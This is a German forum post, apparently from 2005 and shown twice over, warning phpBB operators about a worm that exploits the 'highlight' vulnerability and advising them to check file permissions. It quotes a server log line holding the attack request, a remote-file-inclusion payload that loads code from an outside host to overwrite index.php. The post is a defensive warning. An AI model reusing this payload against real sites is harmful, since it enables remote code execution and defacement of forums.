Roger Bobst
Angesehenes Mitglied
Hallo zusammen
Betreiber des phpbb Forum sollten sich wiedermal warm anziehen: Wies aussieht kricht wieder ein phpbb Wurm durchs Netz. Bei Parlaris haben wir im Moment neue Besucherrekorde
Auf den ersten Blick siehts aus, als würde die lange bekannte "Highlight" Schwachstelle ausgenutzt.
CODE 72.9.246.108 - - [10/Dec/2005:15:17:52 +0100] "GET /viewtopic.php?t=756&highlight=%2527.$poster=include($_GET[m]).%2527&m=http://www.yatas.com/phpbb_private.txt?& HTTP/1.0" 200 28381 "http://www.google.nl/" "Mozilla/4.0 (modded by sirh0t Mist Aleks)"
Der nachgeladene Code von www.yatas.com versucht die index.php zu überschreiben, daher mein Tipp an alle: Prüft die Filerechte !
Doku: Filterechte bei phpbb
Gruss
Roger
Betreiber des phpbb Forum sollten sich wiedermal warm anziehen: Wies aussieht kricht wieder ein phpbb Wurm durchs Netz. Bei Parlaris haben wir im Moment neue Besucherrekorde
Auf den ersten Blick siehts aus, als würde die lange bekannte "Highlight" Schwachstelle ausgenutzt.
CODE 72.9.246.108 - - [10/Dec/2005:15:17:52 +0100] "GET /viewtopic.php?t=756&highlight=%2527.$poster=include($_GET[m]).%2527&m=http://www.yatas.com/phpbb_private.txt?& HTTP/1.0" 200 28381 "http://www.google.nl/" "Mozilla/4.0 (modded by sirh0t Mist Aleks)"
Der nachgeladene Code von www.yatas.com versucht die index.php zu überschreiben, daher mein Tipp an alle: Prüft die Filerechte !
Doku: Filterechte bei phpbb
Gruss
Roger
